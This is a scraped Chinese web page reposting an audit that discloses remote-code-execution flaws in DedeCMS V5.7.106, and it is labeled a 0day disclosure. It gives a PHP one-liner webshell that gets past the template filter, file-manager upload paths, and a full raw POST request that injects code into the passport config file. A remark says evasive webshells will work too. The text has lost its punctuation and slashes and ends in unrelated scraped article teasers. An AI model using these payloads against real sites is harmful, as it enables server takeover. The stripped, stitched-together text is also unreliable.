生活工程体验信仰哲学精神
投稿投诉
精神世界
探索历史
哲学文学
艺术价值
信仰创造
境界审美
体验技术
技能工具
工程信息
医学生产
生活运用
操作能力

DedecmsV5。7RCE审计分析3月版0day披露

12月28日 终离去投稿
  请遵守法律法规,文章仅供安全防范与学习,严禁非法使用,后果自负。简介
  织梦内容管理系统(DedeCMS),采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY自己的网站提供了强有力的支持。影响版本
  version5。7。106环境搭建
  php5。6。9mysql5。6apache
  下载地址
  https:updatenew。dedecms。combasev57packagepatchv57sp2v57sp1v5720230223。zip
  使用小皮部署,www目录下放源码,使用phpstrom进行动态调试即可
  初始化数据库配置安装
  安装完成
  RCErce模板文件绕过正则实现rce
  代码位置
  uploadsdedearticlestringmix。php
  修改模板文件?phpaGLOBALS〔GET〕;bGLOBALS〔GET〕;a〔value1〕(b〔value2〕)?
  文件存储路径
  uploadsdatadownmix。data。php
  访问模板文件测试shell
  分析
  看到在29行的时候对文件内容使用正则表达式进行了校验
  在31行到33行是对diasble的方法做了定义,循环是对文件内容是否使用了disablefunction进行了校验,如果传入的内容含有disable的方法则返回信息DedeCMS提示:当前页面中存在恶意代码,当文件内容为一句话
  返回信息如下
  无法绕过循环,当文件内容为?phpaGLOBALS〔GET〕;bGLOBALS〔GET〕;a〔value1〕(b〔value2〕)?
  的时候这里是可以绕过代码后端的校验内容,debug往下跟
  在这里对文件内容做正则匹配
  继续向下跟进直接写入文件了,导致rce
  所以这里针对模板文件修改实现RCE的话,只要绕过循环以及正则就可以实现,所以免杀马的话就没有问题。
  文件上传RCEuploadsdedefilemanagemain。phpuploadsdedefilemanageview。php?fmdonewfileactivepath2Fuploadsuploadsdedefilemanageview。php?fmdouploadactivepath2Fuploads
  检索ctrlshiftf
  rce配置文件实现rce
  前端修改配置文件导致rce,这里其实可以对比5。7的不同小版本,在106这个版本前后比较明显,在106版本之前,根据fwrite()检索
  路径uploadsdedesysinfomark。php,前端
  修改配置直接写入
  配置文件markincphotowatermarkconfig。php
  这里被转义为测试发现106之前的版本都是没问题的。因为106版本在代码位置多了转义增加了一个反斜杠
  在版本106以及107中,在参数配置文件中同样做了增加反斜杠的代码部分,参数转义后的参数值如下图
  在35行添加了反斜杠,但是在106版本之前依旧可以实现后端RCE
  dedesysinfo。php
  在106版本之前,该位置无函数addslashes
  所以在这里直接修改配置参数
  可直接实现rce
  http:dedecms。org:9999uploadsdataconfig。cache。inc。php
  但是通行证配置的功能在106版以及最新的107版中并未使用addslashes()函数对参数值进行添加反斜杠,路径为
  uploadsdedesyspassport。php
  中的代码并未做任何加固以及补丁,使用BC对比
  两端代码一致,使用payload进行debug分析POSTuploadsdedesyspassport。phpHTTP1。1Host:dedecms。org:9999UserAgent:Mozilla5。0(WindowsNT10。0;Win64;x64;rv:109。0)Gecko20100101Firefox111。0Accept:texthtml,applicationxhtmlxml,q0。9,imageavif,imagewebp,;q0。8AcceptLanguage:zhCN,q0。8,zhTW;q0。7,zhHK;q0。5,enUS;q0。3,q0。2AcceptEncoding:gzip,deflateContentType:applicationxwwwformurlencodedContentLength:162Origin:http:dedecms。org:9999Connection:closeReferer:http:dedecms。org:9999uploadsdedesyspassport。phpCookie:menuitems112C212C31;PHPSESSIDeh4uq681vd4m4cpf0c1jv6q7csrfnamea20d95d79a1330d9413d7550843ea533405a9908;csrfnamea20d95d71BH21ANI1AGD297L1FF21LN02BGE1DNGec2abc545b3af7e5;DedeUserID1;DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG1442494cd39124c2;DedeLoginTime1680536871;DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG941cc93ac807533a;XDEBUGSESSIONXDEBUGECLIPSEUpgradeInsecureRequests:1dopostsaveeditcfgppencodeFwCCr9938Beditcfgpplogindeditcfgppexitt5Ceditcfgppreg3Bphpinfo28293B2FimageField。x36imageField。y4
  保存成功echo后请求配置文件
  http:dedecms。org:9999uploadsincludeconfigpassport。php
  这里直接写入一句话实现RCE即可。
  在这里其实对比在rce配置文件实现rce开头的位置路径uploadsdedesysinfomark。php的分析可以发现这个位置在输入参数内容存在反斜杠的时候因为函数stripslashes删掉了一个反斜杠,所以最终的配置文件内容为
  stripslashes()函数的作用
  运行实例
  小结
  提供一些发散的思路吧,后端的RCE的利用基本都可以围绕这两点。fromhttps:secin。comarticle2167
投诉 评论 转载

滋色睫毛膏好用吗滋色睫毛膏刷头比较细,很适合刷下睫毛和眼角部位,可以拉长睫毛保持卷翘。滋色睫毛膏不易结块,刷出来根根分明,非常自然,日常用一点问题没有。用了滋色睫毛膏之后感觉整个妆容更加好看了……洗胶卷来,宝贝,耶一个鸟语花香的公园里,慈爱的妈妈拿着相机对着可爱的小男孩喊。小男孩立即露出帅气的笑容,摆出酷酷的造型。看着眼前的这一幕,我的思绪飘回到了5年前的六一。六……山东一名酒,从荣登央视宣传到差点倒闭,如今正在重现往日辉煌孔府家酒,让人想家,还有多少人记得这句广告词呢?1993年,不少白酒品牌,尚未找到出路之时,山东一名酒的广告词,便已率先在央视的黄金时段播出,没曾想效果出奇得好,仅仅几天……2023年度街拍中国每周精选图(第14期)主编点评NO。14南昌表叔记得2020年街拍中国刚打卡几个月的时候,为严师傅选过一次照片。选片的时候曾感叹:选片不易,有沙里淘金的感觉。两年多过去,有幸作为街……电磁炉的选购方法电磁炉的危害电磁辐射危害人体的机理主要是热效应、非热效应和累积效应等。热效应主要是因为水分子受到电磁波辐射后相互摩擦,导致温度升高,而人体内含70的水分,所以会使体温升高,从而影响到体内器……开源节流巧理财理财师教你如何戒除网购瘾案例聚焦:边小姐目前税后月薪9000元。2011年结婚后,除了每月3500元的房贷按揭由边小姐负担外,其他养家的钱基本上由先生支出。爱逛街、爱美是每个女人的天性,边小姐也不例外……互联网企业并购风险及其控制的研究摘要互联网在现代生活当中占据着越来越重要的位置,如何在互联网激烈的竞争环境下生存,是自互联网出现以来一直围绕在人们心中的一个难题。众所周知,互联网加快了社会生活的节奏,改变了人……DedecmsV5。7RCE审计分析3月版0day披露请遵守法律法规,文章仅供安全防范与学习,严禁非法使用,后果自负。简介织梦内容管理系统(DedeCMS),采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设……沿海企业利润暴跌刷屏!真相是近日,网上流出一份江浙各地市规模以上工业利润的排名。据这份榜单显示,2023年前两月,宁波、杭州、南京等地工业利润同比均腰斩。如果是真的,确实能一定程度上说明,江浙等地经济面临……意甲最新积分榜那不勒斯5连胜13分领跑,国米赢德比稳居第2!昨晚今晨,意甲联赛第21轮再战4场,国米主场10击败AC米兰,稳居联赛第2位,劳塔罗破门,恰尔汗奥卢送出助攻,AC米兰连续5轮不胜;那不勒斯客场30击败斯佩齐亚,豪取联赛5连胜……PingPong获澳大利亚金融服务牌照,可从事非现金支付和外北京商报讯(记者刘四红)3月30日,北京商报记者获悉,PingPong于近日获得由澳大利亚证券和投资委员会(ASIC)颁发的金融服务牌照,即AustralianFinancia……爱吃春笋人士注意了,男子因贪吃春笋后呕血又昏厥!春天悄然而至,春花美景,美得让我们挪不开眼,更是有不少春季蔬菜让我们喜爱,在这其中就有春笋。虽然竹笋一年四季都有,但春笋最为鲜美,素有春天菜王之称。近日,江苏无锡一……
残疾人生活状况调查与研究记录我的上岸之旅15之旧的不去新的不来LoroPianaCocooning系列被羊绒包裹着的轻松愉坚持下去,全力以赴自律生活Python开发飞机大战小游戏代码开源连续19年蝉联内存第一不是盖的!金士顿疯狂杀价友商都懵圈了承接东部地区产业转移,攀枝花准备好了吗?淘宝信用卡支付怎么开通信用卡支付开通流程解读投屏行业独角兽乐播投屏有何技术优势?微信什么时候才实现双删最新发布河南省又一批建设项目名单公布,看看有你在的城市吗?团队凝聚力读后感二篇

友情链接:中准网聚热点快百科快传网快生活快软网快好知文好找